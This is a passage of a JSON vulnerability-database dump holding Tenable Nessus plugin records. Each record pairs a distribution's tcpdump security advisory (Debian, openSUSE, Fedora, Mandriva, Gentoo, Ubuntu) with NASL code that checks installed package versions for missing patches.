value:\"https://www.debian.org/security/2015/dsa-3193\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the tcpdump packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have\nbeen fixed in version 4.6.2-4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"tcpdump\", reference:\"4.3.0-1+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:11", "bulletinFamily": "scanner", "description": "tcpdump was updated to fix five vulnerabilities in protocol printers\n\nWhen running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities were fixed :\n\n - IPv6 mobility printer remote DoS (CVE-2015-0261,\n bnc#922220)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\n\n - force printer remote DoS (CVE-2015-2155, bnc#922223)\n\n - ethernet printer remote DoS (CVE-2015-2154, bnc#922222)\n\n - tcp printer remote DoS (CVE-2015-2153, 
bnc#922221)", "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "OPENSUSE-2015-267.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82425", "title": "openSUSE Security Update : tcpdump (openSUSE-2015-267)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-267.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82425);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/30 13:59:01 $\");\n\n script_cve_id(\"CVE-2014-9140\", \"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n\n script_name(english:\"openSUSE Security Update : tcpdump (openSUSE-2015-267)\");\n script_summary(english:\"Check for the openSUSE-2015-267 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump was updated to fix five vulnerabilities in protocol printers\n\nWhen running tcpdump, a remote unauthenticated user could have crashed\nthe application or, potentially, execute arbitrary code by injecting\ncrafted packages into the network.\n\nThe following vulnerabilities were fixed :\n\n - IPv6 mobility printer remote DoS (CVE-2015-0261,\n bnc#922220)\n\n - PPP printer remote DoS (CVE-2014-9140, bnc#923142)\n\n - force printer remote DoS (CVE-2015-2155, bnc#922223)\n\n - ethernet printer remote DoS (CVE-2015-2154, bnc#922222)\n\n - tcp printer remote DoS (CVE-2015-2153, bnc#922221)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922221\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=922223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=923142\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tcpdump-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") 
audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debuginfo-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"tcpdump-debugsource-4.4.0-2.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-4.6.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debuginfo-4.6.2-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"tcpdump-debugsource-4.6.2-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump / tcpdump-debuginfo / tcpdump-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:12", "bulletinFamily": "scanner", "description": "Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2015-03-31T00:00:00", "id": "FEDORA_2015-4939.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82445", "title": "Fedora 21 : tcpdump-4.7.3-1.fc21 (2015-4939)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-4939.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82445);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:14:51 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019);\n script_xref(name:\"FEDORA\", value:\"2015-4939\");\n\n script_name(english:\"Fedora 21 : tcpdump-4.7.3-1.fc21 (2015-4939)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to 4.7.3 (#1201573). Contains security fix for CVE-2015-0261,\nCVE-2015-2154, CVE-2015-2153, CVE-2015-2155.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201795\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1201797\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fb71bc45\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif 
(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"tcpdump-4.7.3-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:12", "bulletinFamily": "scanner", "description": "Updated tcpdump package fixes security vulnerabilities :\n\nSeveral vulnerabilities have been discovered in tcpdump. 
These\nvulnerabilities might result in denial of service (application crash)\nor, potentially, execution of arbitrary code (CVE-2015-0261,\nCVE-2015-2153, CVE-2015-2154, CVE-2015-2155).", "modified": "2018-07-19T00:00:00", "published": "2015-03-31T00:00:00", "id": "MANDRIVA_MDVSA-2015-182.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82457", "title": "Mandriva Linux Security Advisory : tcpdump (MDVSA-2015:182)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:182. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82457);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/19 20:59:19\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019, 73021);\n script_xref(name:\"MDVSA\", value:\"2015:182\");\n\n script_name(english:\"Mandriva Linux Security Advisory : tcpdump (MDVSA-2015:182)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated tcpdump package fixes security vulnerabilities :\n\nSeveral vulnerabilities have been discovered in tcpdump. 
These\nvulnerabilities might result in denial of service (application crash)\nor, potentially, execution of arbitrary code (CVE-2015-0261,\nCVE-2015-2153, CVE-2015-2154, CVE-2015-2155).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0114.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif 
(cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tcpdump-4.2.1-2.3.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:22:40", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201510-04\n(tcpdump: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in tcpdump. Please review\n the CVE identifiers referenced below for details.\nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\nWorkaround :\n\n There is no known workaround at this time.", "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "GENTOO_GLSA-201510-04.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=86689", "title": "GLSA-201510-04 : tcpdump: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201510-04.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86689);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2015/11/02 14:33:25 $\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_xref(name:\"GLSA\", value:\"201510-04\");\n\n script_name(english:\"GLSA-201510-04 : tcpdump: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201510-04\n(tcpdump: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in tcpdump. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201510-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All tcpdump users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/tcpdump-4.7.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/02\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/tcpdump\", unaffected:make_list(\"ge 4.7.4\"), vulnerable:make_list(\"lt 4.7.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:24", "bulletinFamily": "scanner", "description": "It was discovered that tcpdump incorrectly handled printing certain\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the\ntcpdump AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2015-04-28T00:00:00", "id": "UBUNTU_USN-2580-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83112", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : tcpdump vulnerabilities (USN-2580-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2580-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83112);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2018/12/01 15:12:39\");\n\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\");\n script_bugtraq_id(73017, 73018, 73019, 73021);\n script_xref(name:\"USN\", value:\"2580-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : tcpdump vulnerabilities (USN-2580-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that tcpdump incorrectly handled printing certain\npackets. A remote attacker could use this issue to cause tcpdump to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode.\n\nIn the default installation, attackers would be isolated by the\ntcpdump AppArmor profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2580-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tcpdump package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! 
get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"tcpdump\", pkgver:\"4.2.1-1ubuntu2.2\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"tcpdump\", pkgver:\"4.5.1-2ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"tcpdump\", pkgver:\"4.6.2-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tcpdump\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:21:53", "bulletinFamily": "scanner", "description": "Integer signedness error in the mobility_opt_print function in the\nIPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers\nto cause a denial of service (out-of-bounds read and crash) or\npossibly execute arbitrary code via a negative length value.\n(CVE-2015-0261)\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet\nprinter in tcpdump before 4.7.2 allows remote attackers to cause a\ndenial of service (out-of-bounds read and crash) via a crafted (1)\nlength, (2) offset, or (3) base pointer checksum value.\n(CVE-2015-2154)", "modified": "2018-04-18T00:00:00", 
